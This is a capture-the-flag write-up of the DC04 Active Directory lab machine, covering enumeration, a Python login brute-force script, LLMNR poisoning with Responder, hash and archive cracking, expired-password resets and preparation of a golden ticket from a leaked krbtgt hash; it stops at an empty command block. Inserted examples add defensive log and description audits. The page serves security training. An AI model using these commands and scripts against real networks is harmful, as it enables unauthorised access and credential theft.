# DC04

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FwGv4iq2as0taI9TQcoih%2FPasted%20image%2020250312020103.png?alt=media&#x26;token=7ad8e851-60e6-4d6a-a881-01091a4e1e48" alt=""><figcaption></figcaption></figure>

Download it, unzip it, and configure the network the same way as for the DC01 machine.

## Enumeration:

We will do an SMB sweep of the subnet to find its IP:

```bash
netexec smb 10.0.2.0/24
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FwcMG8Y3OgYCogun2Vfv4%2FPasted%20image%2020250312020910.png?alt=media&#x26;token=85947906-b7f2-415c-b726-e978c7e94851" alt=""><figcaption></figcaption></figure>

So we will add it to /etc/hosts:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FjUc7h2XU3672JmcadQD0%2FPasted%20image%2020250312020953.png?alt=media&#x26;token=7b517292-4d7b-4cef-a7e8-7895dd619a7c" alt=""><figcaption></figcaption></figure>

Now let's start an nmap scan of all TCP ports:

```bash
sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv soupedecode.local
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F01An5bANqFNuTLe89jaB%2FPasted%20image%2020250312021449.png?alt=media&#x26;token=c8a63d1f-5d3b-4a64-91e6-7b2ca3edbcca" alt=""><figcaption></figcaption></figure>

It's an Active Directory machine, and there is a web server running on it.

We can do directory and vhost fuzzing:

```bash
gobuster dir -u http://soupedecode.local -w /usr/share/wordlists/dirb/common.txt -t 16
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FhbL60RuAOnzuIaUvKl1K%2FPasted%20image%2020250312023904.png?alt=media&#x26;token=ce8f9cdd-7621-44f0-aa01-2589114516a4" alt=""><figcaption></figcaption></figure>

But we get a lot of 403 responses with the same size; we can exclude that size in gobuster using `--exclude-length`:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FjmWGoCLGMlxa1j2dMcM1%2FPasted%20image%2020250312023110.png?alt=media&#x26;token=b4193116-1030-4228-a037-2c23adb6d1b5" alt=""><figcaption></figcaption></figure>

Let's take a look at the server-info page:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FPWCCmFUvCWSKjJFGC9NS%2FPasted%20image%2020250312023241.png?alt=media&#x26;token=332e32c6-4455-461d-9661-d7cead55009f" alt=""><figcaption></figcaption></figure>

This page usually discloses configuration information about the web server; in it we can find hidden directories, files or subdomains, for example.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fvmfkn7B0nL5V6OWtHS0O%2FPasted%20image%2020250312024222.png?alt=media&#x26;token=9b2e390a-796f-4209-ab46-88d1540000e4" alt=""><figcaption></figcaption></figure>

If we search a little we will find this subdomain.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FFAWleVzpOXm2XaaEjyi6%2FPasted%20image%2020250312024303.png?alt=media&#x26;token=a4a3ecd8-b2ef-4f85-be77-2a2c082bdda5" alt=""><figcaption></figcaption></figure>

Let's add it to /etc/hosts.

## LLMNR poisoning to get the NTLMv2 hash of websvc:

We need credentials to authenticate:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F1HAZIk74HhLf0Aej2tny%2FPasted%20image%2020250312024348.png?alt=media&#x26;token=360ebf86-3c45-4d3b-8fc0-3595ac24ec89" alt=""><figcaption></figcaption></figure>

Let's try some combinations of default credentials:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FNeDA4hK28qHZp3MlmbJA%2FPasted%20image%2020250312024408.png?alt=media&#x26;token=9de12b4d-a882-4dde-b044-085761d3df7e" alt=""><figcaption></figcaption></figure>

Invalid credentials with admin:admin.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FRTDS5iJsovh6rWrZRjhD%2FPasted%20image%2020250312024434.png?alt=media&#x26;token=c9597ed6-41cf-47c2-a955-4a0273bdb19f" alt=""><figcaption></figcaption></figure>

There is no SQLi either.

Let's get the format of the request body so we can start brute forcing:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fxp6LWAR50t9xI9lUZ6aX%2FPasted%20image%2020250312024932.png?alt=media&#x26;token=6ccea3ac-cafb-427b-8bab-87855e2d9337" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FKImVGktcMFaduodpqN7Y%2FPasted%20image%2020250312024914.png?alt=media&#x26;token=83ea3698-f847-4613-8b9f-a50b4ae8a273" alt=""><figcaption></figcaption></figure>

I wrote this simple script, which will help us brute force this login form using a simple wordlist:

```python
import requests

url = 'http://heartbeat.soupedecode.local'
end_point = '/login.php'
session = requests.session()
# Headers copied from the browser request. Content-Length is left out on purpose:
# requests computes it for every request, and a fixed value would not match the
# body length of most username/password combinations.
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,'
                     'image/svg+xml,*/*;q=0.8',
           'Accept-Language': 'en-US,en;q=0.5',
           'Accept-Encoding': 'gzip, deflate, br',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Origin': 'http://heartbeat.soupedecode.local',
           'Connection': 'keep-alive',
           'Referer': 'http://heartbeat.soupedecode.local/login.php',
           'Upgrade-Insecure-Requests': '1',
           'Priority': 'u=0, i'
           }

# Every word in the list is tried both as a username and as a password.
with open('/usr/share/seclists/Passwords/UserPassCombo-Jay.txt', 'r') as wordlist:
    words = [w.strip() for w in wordlist if w.strip()]

for username in words:
    for password in words:
        # Pass the form fields as a dict so requests urlencodes characters like '&' or '%'.
        data = {'username': username, 'password': password}
        req = session.post(url=url + end_point, headers=headers, data=data, timeout=10)
        # The login page answers "Invalid username" on a failed attempt, so any other
        # response means this pair deserves a closer look.
        if 'Invalid username' not in req.text:
            print(f'Valid Credentials: {username}:{password}')
            break
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FOodwGb4rX2F5VPH7p1Hf%2FPasted%20image%2020250312054524.png?alt=media&#x26;token=69ff478c-3a0a-4c72-af00-bd5323aa3022" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FXnhv8tjZRp9OUZ9pK7EY%2FPasted%20image%2020250312054601.png?alt=media&#x26;token=e3ebb452-af01-4830-9757-8dc2e364052b" alt=""><figcaption></figcaption></figure>

I restarted this machine more than once, so as you read on the IP changes to 10.0.2.33.

After a while we will get these credentials.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F6bUDl7h2O7lZnSYoxQNG%2FPasted%20image%2020250312054737.png?alt=media&#x26;token=ca99594b-1467-4f2b-a91b-126466df6651" alt=""><figcaption></figcaption></figure>
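The brute force above leaves an obvious trace in the web server's access log. As an added example (my code, not part of the original post), here is a sliding-window detector for it; it assumes Apache's combined log format for the heartbeat vhost and a threshold of 20 POSTs to /login.php per minute, and the log lines it runs on are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/httpd "combined" access log format (assumed to be what the heartbeat vhost writes).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, ua; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec

def detect_login_bruteforce(lines, path='/login.php', window_s=60, threshold=20):
    """Sliding-window detector for a scripted login guess.

    Returns alerts as (ip, kind, posts_in_window, timestamp):
      'burst'               one client POSTed to `path` >= threshold times inside window_s seconds
      'burst-then-redirect' while still in a burst, the client got a 3xx from `path`; for a form
                            that answers failures with 200 this usually means a guess succeeded
    window_s and threshold are assumptions; tune them to the application's real traffic."""
    alerts = []
    recent = defaultdict(deque)   # ip -> timestamps of its recent POSTs to path
    in_burst = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec['method'] != 'POST' or rec['path'] != path:
            continue
        ip, ts = rec['ip'], rec['ts']
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop POSTs older than the window
            q.popleft()
        if len(q) >= threshold:
            if ip not in in_burst:
                in_burst.add(ip)
                alerts.append((ip, 'burst', len(q), ts))
            if 300 <= rec['status'] < 400:
                alerts.append((ip, 'burst-then-redirect', len(q), ts))
        else:
            in_burst.discard(ip)
    return alerts

def make_sample():
    """Constructed log lines (not from the target): a scripted client that sends 24 failed
    POSTs one second apart and then one that is redirected, plus a normal user who logs in."""
    ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0'
    base = datetime(2025, 3, 12, 5, 45, 0, tzinfo=timezone.utc)
    def line(ip, offset, status):
        ts = (base + timedelta(seconds=offset)).strftime('%d/%b/%Y:%H:%M:%S %z')
        return (f'{ip} - - [{ts}] "POST /login.php HTTP/1.1" {status} 1532 '
                f'"http://heartbeat.soupedecode.local/login.php" "{ua}"')
    lines = [line('10.0.2.15', i, 200) for i in range(24)] + [line('10.0.2.15', 24, 302)]
    lines += [line('10.0.2.20', 5, 200), line('10.0.2.20', 40, 302)]
    return lines

if __name__ == '__main__':
    for alert in detect_login_bruteforce(make_sample()):
        print(alert)
```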

Here it is asking for an IP, let's try SSRF:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FBTOqxlwwQn2wqRnFDvMx%2FPasted%20image%2020250312054810.png?alt=media&#x26;token=c6dc1fe2-4224-4eb5-b55c-7f1662a013c7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FjTb6K5lNgtl1EkCg9BQt%2FPasted%20image%2020250312054858.png?alt=media&#x26;token=c2dd1fbe-99c3-40a3-a2be-56bd27255727" alt=""><figcaption></figcaption></figure>

I could not get to anything.

But let's start Responder and try to capture an NTLMv2 hash:

```bash
sudo responder -I eth0 -dvw
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F9ZoD1J4prGi6ZVMPQidC%2FPasted%20image%2020250312055644.png?alt=media&#x26;token=79de79ed-ff44-4f58-abe3-8d53654ca3c6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FSbkisayTWmdxQ3Rk5tbp%2FPasted%20image%2020250312055708.png?alt=media&#x26;token=9194fd06-ebea-4efb-905b-ab2eb46a209d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FBf9hMbx6h6QYw4qWCnPb%2FPasted%20image%2020250312055725.png?alt=media&#x26;token=c0253c42-9d08-4055-92c1-cf15e27fd684" alt=""><figcaption></figcaption></figure>

We captured the websvc hash; we can crack it with hashcat:

```bash
hashcat websvc.hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FUeEbChBtinUMqzr3HtuG%2FPasted%20image%2020250312055808.png?alt=media&#x26;token=7a0c9ed0-9480-45af-9737-985efa74d337" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FD5OK9bdvuw7fG8DQOMKz%2FPasted%20image%2020250312055819.png?alt=media&#x26;token=abaf5749-b603-46c5-a1cb-2126bb0b1cfb" alt=""><figcaption></figcaption></figure>

Here we have the password cracked.

Let's try to authenticate:

```bash
netexec smb soupedecode.local -u websvc -p jordan23
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FbobUvISqza9lRH5KuhXi%2FPasted%20image%2020250312055906.png?alt=media&#x26;token=05e811d1-e36a-48e8-b6b9-21c7594e7195" alt=""><figcaption></figcaption></figure>

It says the password has expired, so we can go to the logon UI prompt to reset it:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FF7Xi4kyfkpeU6oh7CMxa%2FPasted%20image%2020250312061855.png?alt=media&#x26;token=78131033-f19f-4163-814f-3a59af8213df" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FhP5qseIPFACSUVPBA8VP%2FPasted%20image%2020250312061920.png?alt=media&#x26;token=43530e82-b2d4-41df-b944-dc312c43dd3c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FXX4X76j8IR82d8Zl565H%2FPasted%20image%2020250312062003.png?alt=media&#x26;token=5c9e003d-41d4-460d-97da-45d43f451719" alt=""><figcaption></figcaption></figure>

The password has been changed, let's try it out:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FnIMyEUUxzzgvqfMgiB08%2FPasted%20image%2020250312062045.png?alt=media&#x26;token=089cf488-61e5-41e2-9c64-80042d80b320" alt=""><figcaption></figcaption></figure>

Finally we have valid credentials.

Let's collect the domain data and do some BloodHound enumeration:

```bash
bloodhound-python -u websvc -p Caesar3 -ns 10.0.2.33 -d soupedecode.local -dc dc01.soupedecode.local
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FB9cMHkRlYrS6lwsp3brO%2FPasted%20image%2020250312064416.png?alt=media&#x26;token=9552f254-578b-4c83-b371-da9659e7c7f1" alt=""><figcaption></figcaption></figure>

For some reason we need to set up a fake DNS server for this to work:

```bash
dnschef --fakeip 10.0.2.33
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FvNyMe0HgkrUb4nNxyHe3%2FPasted%20image%2020250312063607.png?alt=media&#x26;token=a35b1784-100a-42aa-bdef-cffc3eeeadee" alt=""><figcaption></figcaption></figure>

And now re-execute the bloodhound-python command, but with our localhost IP as the name server instead of the target IP:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FJrovT0F85LChnuZqI8Md%2FPasted%20image%2020250312064556.png?alt=media&#x26;token=86ba20b1-3543-493a-ac97-fa94a2fad084" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FrGNiH7QaL1STpqjHlNzL%2FPasted%20image%2020250312064633.png?alt=media&#x26;token=fdc3cf7d-dc1c-4557-9a3f-04d9d8ab6756" alt=""><figcaption></figcaption></figure>

Let's start BloodHound, but first we need to start the database that BloodHound uses:

```bash
sudo neo4j start
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FO8f9CZDaXstgFdJbt6fl%2FPasted%20image%2020250312064712.png?alt=media&#x26;token=2124b697-40a8-467c-82c7-67393656452d" alt=""><figcaption></figcaption></figure>

After that we will go to that link, log in as neo4j:neo4j, reset the password, and use the same credentials to authenticate in BloodHound:

```bash
bloodhound
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FjuMqzkN9dAIDluKHExkk%2FPasted%20image%2020250312064739.png?alt=media&#x26;token=632292a9-ce56-4ba3-bd5a-090746a00e44" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FawQxLRNd6g9VZ3PHtEtl%2FPasted%20image%2020250312064753.png?alt=media&#x26;token=1d526207-8d37-4370-bdd4-f2f5e097b2bc" alt=""><figcaption></figcaption></figure>

Drag and drop those JSON files into BloodHound:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FWvqteFBuLCeFV57BEkHO%2FPasted%20image%2020250312064842.png?alt=media&#x26;token=7e383bce-5cbf-4b2c-89f0-753af00091a2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F3kRQeUSZZcpVMPQ5qRtE%2FPasted%20image%2020250312064904.png?alt=media&#x26;token=b32186ce-ea5d-4ef9-9b58-2dcaf2c52725" alt=""><figcaption></figcaption></figure>

I did not find anything that could help us.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fwd19o0PMOz0RSyS4EhgZ%2FPasted%20image%2020250312062204.png?alt=media&#x26;token=5fd7ddab-5182-497a-b7b2-753b39c04f2f" alt=""><figcaption></figcaption></figure>

There is nothing interesting in the home directory of the websvc user in the C share that we have read access to.

## Move Laterally to rtina979:

Let's move on and dump the other domain users:

```bash
netexec smb soupedecode.local -u websvc -p Caesar3 --users > temp.txt
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fwz039AOL6jVYjbZ6LpY5%2FPasted%20image%2020250312062433.png?alt=media&#x26;token=3e73ffd0-73e4-487e-9f8d-7d0dc01355b7" alt=""><figcaption></figcaption></figure>

Extract the usernames from that temp file:

```bash
awk '{print $5}' temp.txt > users.txt
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FE6Ju2VRSP1MKcnbWHiLX%2FPasted%20image%2020250312062528.png?alt=media&#x26;token=cee49706-ef99-4365-b506-b80d93460a5d" alt=""><figcaption></figcaption></figure>

If we extract the descriptions of the users, we will find a default password for one user:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FYhRWqQruubXDNkSRf8cO%2FPasted%20image%2020250312062724.png?alt=media&#x26;token=b7f3f0bd-9575-4032-94d9-de1de9cc25f3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FHySwHt18mK4mrdIYbqaj%2FPasted%20image%2020250312063235.png?alt=media&#x26;token=5f89e4c3-5672-4197-a214-246cdcf235b7" alt=""><figcaption></figcaption></figure>
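The description check from the step above, written out as an added example (my code, not the author's): a small parser for the netexec `--users` output that assumes the same column layout the page's `awk '{print $5}'` relies on, plus an audit that flags any description mentioning a password, which is the AD hygiene check a defender would run over their own export. The sample output, dates and the rtina979 description are constructed placeholders, not the real ones.

```python
import re

# Constructed sample of `netexec smb <target> --users` output (not captured from the
# target): banner, auth line, column header, then one row per user. The username is the
# fifth whitespace-separated field, which is what the page's `awk '{print $5}'` relies on.
# Dates, the BadPW counts and all descriptions are made up.
SAMPLE = """\
SMB         10.0.2.33       445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:soupedecode.local) (signing:True)
SMB         10.0.2.33       445    DC01             [+] soupedecode.local\\websvc:Caesar3
SMB         10.0.2.33       445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.0.2.33       445    DC01             Administrator                 2024-06-10 14:02:11 0       Built-in account for administering the computer/domain
SMB         10.0.2.33       445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.0.2.33       445    DC01             websvc                        2025-03-12 06:20:03 0
SMB         10.0.2.33       445    DC01             rtina979                      2024-06-10 14:05:41 0       New hire. Temp password: Welcome-PLACEHOLDER-1! (must change at first logon)
"""

# One user row: four fixed columns, the username, a timestamp or <never>, the bad
# password count, and whatever is left as the description.
ROW_RE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+"
    r"(?P<user>[^\s\[\-]\S*)\s+"                                 # skips [*]/[+] and -Username-
    r"(?P<pwset><never>|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<badpw>\d+)\s*(?P<desc>.*)$")

# Words that, in a description field, usually mean a credential was written into AD.
CRED_WORDS = re.compile(r"\b(pass(word)?|passwd|pwd|pw|cred(ential)?s?|secret)\b", re.I)

def parse_users(text):
    """Return (username, last_pw_set, bad_pw_count, description) for each user row."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((m["user"], m["pwset"], int(m["badpw"]), m["desc"].strip()))
    return rows

def usernames(text):
    """The same list the page builds with awk, minus the banner and header lines."""
    return [row[0] for row in parse_users(text)]

def audit_descriptions(text):
    """Return (username, description, matched_word) for every description that looks
    like it carries a credential."""
    hits = []
    for user, _pwset, _badpw, desc in parse_users(text):
        m = CRED_WORDS.search(desc)
        if m:
            hits.append((user, desc, m.group(1).lower()))
    return hits

if __name__ == "__main__":
    print("users:", ", ".join(usernames(SAMPLE)))
    for user, desc, word in audit_descriptions(SAMPLE):
        print(f"[!] {user}: description mentions '{word}': {desc}")
```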

Try to authenticate:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FTaGbniIYnLRP9xKzuZfH%2FPasted%20image%2020250312063354.png?alt=media&#x26;token=2de04f64-4690-4388-a1b8-ebbbac6dd18a" alt=""><figcaption></figcaption></figure>

Also expired, so we can change the password using smbpasswd or impacket-changepasswd:

```bash
impacket-changepasswd 'soupedecode.local'/'rtina979'@'soupedecode.local' -newpass 'Caesar3!' -altuser websvc -altpass Caesar3
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FYj5RKCHE0SOnsv3KZKpm%2FPasted%20image%2020250312065547.png?alt=media&#x26;token=44d90f68-d8fa-4dfb-abbd-d5ed8b456794" alt=""><figcaption></figcaption></figure>

We changed the password successfully.

## Privilege Escalation via Golden Ticket attack:

Let's go back to the C share again to check the rtina979 home directory:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fd25gwOpiNcXTWFsMTlwK%2FPasted%20image%2020250312070632.png?alt=media&#x26;token=52d6d41d-42b6-4bd0-8f71-d13e2be75771" alt=""><figcaption></figcaption></figure>

After enumerating this share I found a file called Report.rar:

```bash
smbclient \\\\10.0.2.33\\C -U 'rtina979%Caesar3!'
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FIgaStvu7rer3F05us6Qz%2FPasted%20image%2020250312070600.png?alt=media&#x26;token=c2274962-adb5-491e-bf50-f362af5a71e9" alt=""><figcaption></figcaption></figure>

Download it and try to extract it:

```bash
unrar x Report.rar
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fhsocv2uJMI63wqrt2A4r%2FPasted%20image%2020250312070706.png?alt=media&#x26;token=ea8295af-c505-4553-bd3f-90080eddf729" alt=""><figcaption></figcaption></figure>

But it is encrypted with a password; we can use rar2john and then try to crack that hash to get the password for the archive:

```bash
rar2john Report.rar > report.hash
```

```bash
john report.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F1C6K0MoMYNKgEK6sUz7u%2FPasted%20image%2020250312070936.png?alt=media&#x26;token=f4081492-9f9b-43a1-9655-15a9776e6cdd" alt=""><figcaption></figcaption></figure>

Extract it again with that password:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FGw0bTCxCELpRAALA2r0D%2FPasted%20image%2020250312071022.png?alt=media&#x26;token=fccfe93c-14d1-4578-ab18-b00d23dc20b0" alt=""><figcaption></figcaption></figure>

We have an .htm file and a bunch of .js scripts.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F994J9wG9aI4W9ozXUQLR%2FPasted%20image%2020250312071224.png?alt=media&#x26;token=e3588015-d624-436f-ac34-86232e19e2dd" alt=""><figcaption></figcaption></figure>

If we open that .htm file in Firefox, we will see that it is a penetration testing report:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FhXwnugoLC8cyIuAyWHRr%2FPasted%20image%2020250312071404.png?alt=media&#x26;token=44267a19-fb0d-4e63-ba0e-2d00d34b378f" alt=""><figcaption></figcaption></figure>

After some reading we will find the krbtgt hash for this target system. Companies usually do not change the krbtgt password because rotating it is not a simple task, so a hash leaked in an old report is very likely still valid.

Let's try to get a golden ticket with that krbtgt hash:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FZvK2C2GxfDPvnCKqvaYi%2FPasted%20image%2020250312071540.png?alt=media&#x26;token=27907d4e-65bc-42d1-b876-7b423e971d2f" alt=""><figcaption></figcaption></figure>

But before that we need the SID of the domain, which we can get by running impacket-lookupsid:

```bash
impacket-lookupsid soupedecode.local/rtina979:'Caesar3!'@10.0.2.33
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FmnKH11w5jvLUu3k07cwG%2FPasted%20image%2020250312072008.png?alt=media&#x26;token=3f366cc0-317d-42fa-a277-49fd8e7133f2" alt=""><figcaption></figcaption></figure>

Now we will use impacket-ticketer to forge a ticket:

```bash
